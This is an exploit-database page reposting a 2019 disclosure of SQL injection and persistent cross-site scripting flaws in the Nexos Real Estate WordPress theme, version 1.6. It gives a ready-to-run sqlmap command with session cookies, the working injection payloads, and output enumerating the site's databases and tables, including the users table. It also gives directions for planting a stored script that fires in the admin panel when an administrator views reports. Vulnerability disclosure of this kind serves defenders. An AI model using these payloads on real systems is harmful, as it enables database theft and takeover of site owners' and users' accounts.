Advertisement






Nexos - Real Estate WordPress Theme SQL Injection & Persistent XSS

CVE Category Price Severity
N/A CWE-79 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2019-09-08
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090058

Below is a copy:

Nexos - Real Estate WordPress Theme SQL Injection & Persistent XSS
# Exploit Title: Nexos - Real Estate WordPress Theme SQL Injection & Persistent XSS
# Google Dork: -
# Date: 08/09/2019
# Exploit Author: SubversA
# Vendor Homepage: https://listing-themes.com/
# Software Link: https://themeforest.net/item/nexos-real-estate-agency-directory/21126242
# Version: 1.6
# Tested on: Parrot OS
# CVE : -
# CWE : 79, 89

----[]- SQL Injection: -[]----
Vulnerable 'id' parameter is https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=8
You need a new user account (agent:agent on the demo website), then use the sqlmap (with --cookie option):

sqlmap --url="https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_addlisting&id=6" --cookie="wordpress_logged_in_0123456789=agent%7C1a2b3c4d5e6f7g8h9i0j; wordpress_sec_0123456789=agent%7C0a1b2c3d4e5f6g7h8i9j" --dbs -D geniuscr_nexos --tables

[00:22:56] [INFO] resuming back-end DBMS 'mysql' 
[00:22:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: page=ownlisting_addlisting&id=-1899' OR 8845=8845#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=ownlisting_addlisting&id=6' AND (SELECT 7374 FROM(SELECT COUNT(*),CONCAT(0x7171717871,(SELECT (ELT(7374=7374,1))),0x7162717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fesJ

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: page=ownlisting_addlisting&id=6' OR SLEEP(5)-- wYvo
---

available databases [2]:
[*] geniuscr_nexos
[*] information_schema

Database: geniuscr_nexos
[48 tables]
+-------------------------------+
| wp_commentmeta                |
| wp_comments                   |
| wp_links                      |
| wp_options                    |
| wp_postmeta                   |
| wp_posts                      |
| wp_revslider_css              |
| wp_revslider_layer_animations |
| wp_revslider_navigations      |
| wp_revslider_sliders          |
| wp_revslider_slides           |
| wp_revslider_static_slides    |
| wp_sw_cacher                  |
| wp_sw_calendar                |
| wp_sw_currency                |
| wp_sw_dependentfields         |
| wp_sw_favorite                |
| wp_sw_field                   |
| wp_sw_field_lang              |
| wp_sw_file                    |
| wp_sw_inquiry                 |
| wp_sw_invoice                 |
| wp_sw_listing                 |
| wp_sw_listing_agent           |
| wp_sw_listing_field           |
| wp_sw_listing_lang            |
| wp_sw_messages                |
| wp_sw_packagerank             |
| wp_sw_profile                 |
| wp_sw_rates                   |
| wp_sw_report                  |
| wp_sw_repository              |
| wp_sw_reservation             |
| wp_sw_review                  |
| wp_sw_savesearch              |
| wp_sw_search_form             |
| wp_sw_settings                |
| wp_sw_slug                    |
| wp_sw_subscriptions           |
| wp_sw_tokenapi                |
| wp_sw_treefield               |
| wp_sw_treefield_lang          |
| wp_term_relationships         |
| wp_term_taxonomy              |
| wp_termmeta                   |
| wp_terms                      |
| wp_usermeta                   |
| wp_users                      |
+-------------------------------+


----[]- Persistent XSS: -[]----
You need a new user account, then go to any property listing on the website and use ENQUIRY FORM on the right sidebar. Vulnerable text area is Message. Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=ownlisting_messages page many times for any basic user.

Or you can press the REPORT LISTING button on any property page and use your payload inside the Message text box. Injection will trigger on the https://listing-themes.com/nexos-wp/wp-admin/admin.php?page=listing_reports page when administrator will be online.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.